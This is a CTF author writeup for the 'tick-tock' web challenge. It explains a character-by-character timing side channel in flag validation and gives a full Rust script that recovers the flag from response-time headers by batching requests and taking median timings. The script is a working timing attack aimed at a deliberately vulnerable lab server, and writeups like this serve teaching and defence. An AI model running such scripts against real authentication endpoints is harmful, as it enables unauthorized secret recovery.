# `web/tick-tock` Author Writeup
Max Leibowitz/foo
## The challenge
`tick-tock` is a simple timing attack challenge.  The vulnerable server checks if the flag you provide is correct first by length and then character-by-character, with an artificial delay to make it easier.  The server includes the execution time for the request in all of its responses.  This isn't quite representative of real life timing vulnerabilities; oftentimes they are more convoluted than a direct string equals, don't include execution time, and of course they don't have the artificial delay.  All this means is that a real life attack would require more knowledge of the target software, and vastly more samples, though it is still potentially viable.
### Pseudocode
```
function validateKey(apiKey):
	if apiKey.length != flag.length():
		return false
	
	# artificial delay

	for index in 0..flag.length():
		# artifical delay
		
		if apiKey[index] != flag[index]:
			return false
	return true
```
## The solution
The solution is to first brute force the length if statement by trying many invalid flags of various lengths, and finding which one takes the longest.  Then, you test every possibility for the first character and find which one takes the longest.  Because the delays are relatively small (100 microseconds between each character) and load is variable, multiple samples per character are needed.
## Solution script
```rust
use std::{io::{stdin, stdout, Write}, time::Duration};

use futures::future::try_join_all;
use reqwest::{Client, StatusCode};
use tokio::time::sleep;

#[derive(Debug)]
enum UrlResult {
    Flag(String),
    Time(Duration)
}

#[derive(Debug)]
enum RequestError {
    RequestError,
    BadTime
}

async fn single_req(client: &Client, path: &str, flag: &str) -> Result<UrlResult, RequestError> {
    let request = client.get(path).header("X-FLAG", flag).build().unwrap();
    let result = client.execute(request).await.map_err(|_| RequestError::RequestError)?;

    match result.status() {
        v if v.is_success() => Ok(UrlResult::Flag(flag.to_string())),
        StatusCode::FORBIDDEN => {
            // extract the TIME header, if it doesn't exist/isn't a number then return a BadTime error
            let time_str = result.headers().get("TIME").map(|x| x.to_str().ok()).flatten();
            let time = time_str.map(|x| x.parse::<u64>().ok()).flatten().ok_or(RequestError::BadTime)?;

            Ok(UrlResult::Time(Duration::from_nanos(time)))
        }
        _ => Err(RequestError::RequestError)
    }
}

/// Runs a batch of [count] requests and returns the median duration
async fn batch(client: &Client, path: &str, flag: String, count: usize) -> Result<UrlResult, RequestError> {
    let mut trials = vec![];
    for _ in 0..count {
        trials.push(single_req(client, path, &flag));
    }

    let mut times = vec![];
    for item in try_join_all(trials).await? {
        match item {
            UrlResult::Flag(v) => return Ok(UrlResult::Flag(v)),
            UrlResult::Time(t) => times.push(t),
        }
    }

    times.sort();

    Ok(UrlResult::Time(times[times.len() / 2]))
}

#[tokio::main]
async fn main() {
    let client = Client::new();
    
    let path = "https://DOMAIN-HERE/flag";
    
    let mut flag = String::new();
    
    let mut max = None;

    // determine length of flag
    for len in 0..50 {
        flag = "!".repeat(len);
        
        if let Ok(UrlResult::Time(res)) = batch(&client, path, flag.clone(), 10).await {
            match &mut max {
                Some((length, time)) => {
                    if &res > time {
                        *length = len;
                        *time = res;
                    }
                }
                None => max = Some((len, res))
            }
        } else {
            panic!("error while finding length");
        }
    }
    
    println!("flag length: {} chars", max.unwrap().0);
    
    // start out with a flag composed of characters not in the real flag for simplicity
    flag = "!".repeat(max.unwrap().0);

    let charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789={}".chars().collect::<Vec<_>>();
    let mut char: usize = 0;
    loop {
        let mut trials = vec![];
        // go through each character and run 40 trials on it
        for c in &charset {
            let mut fl = flag.clone();
            fl.replace_range(char..char + 1, &c.to_string());
            let res = batch(&client, path, fl, 40).await.unwrap();
            trials.push((*c, res));
            // this seemed to make it work better
            sleep(Duration::from_millis(5)).await;
        }
        
        // make sure each trial actually worked and unwrap them/return the flag
        let mut times = vec![];
        for t in trials {
            match t.1 {
                UrlResult::Flag(value) => {
                    println!("got flag {value}");
                    return;
                }
                UrlResult::Time(v) => times.push((t.0, v))
            }
        }
        
        times.sort_by_key(|x| x.1);
        times.reverse();
        
        println!("flag so far: {flag}");
        println!("next character: {}, delay {:?} (avg {:?})", times[0].0, times[0].1, times.iter().map(|x| x.1).sum::<Duration>().div_f64(charset.len() as f64));
        flag.replace_range(char..char + 1, &times[0].0.to_string());

        char += 1;
        loop {
            // sometimes due to noise it gets the wrong character, so provide an option to backtrack or continue forward
            print!("0 to continue on to next character, or a positive number to backtrack ");
            stdout().flush().unwrap();
            let mut inp = String::new();
            stdin().read_line(&mut inp).unwrap();

            if let Ok(v) = inp.replace("\n", "").parse::<u32>() {
                if v > char as u32 { continue }
                char -= v as usize;
                break;
            }
        }
    }
}
```